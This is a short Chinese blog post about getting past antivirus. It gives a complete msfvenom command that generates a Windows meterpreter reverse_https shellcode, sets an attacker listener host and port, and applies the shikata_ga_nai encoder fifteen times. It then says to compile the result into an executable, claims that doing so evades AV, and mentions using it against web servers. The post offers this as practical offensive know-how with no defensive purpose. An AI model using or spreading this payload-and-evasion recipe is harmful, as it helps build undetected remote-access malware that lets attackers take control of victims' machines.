Web安全与渗透 2019-05-29

shellcode貌似又不免杀了,继续更新....(20190525)

By Jove 1 Views 2 MIN READ 0 Comments

之前说过使用msf生成shellcode 使用特殊编码十五六次就可以过静态查杀了，奈何Anti Virus(反病毒软件), 简称AV。不可能一直允许的啊.... 不废话了，直接还是shellcode生成，继续过AV。

msfvenom -p windows/meterpreter/reverse_https lhost=xxx.xxx.xxx.xxx lport=8888 -e x86/shikata_ga_nai -i 15 --smallest -b '\x00' -f c > 1

把1里的shellcode编译成exe即可，至于为什么能过AV，可能是使用了http协议，对于日一台web服务器，AV们也不敢管，也不敢细问啊....

本文由 Jove 原创

采用 CC BY-NC-SA 4.0 协议进行许可

TAGS: 无标签

Jove・筆記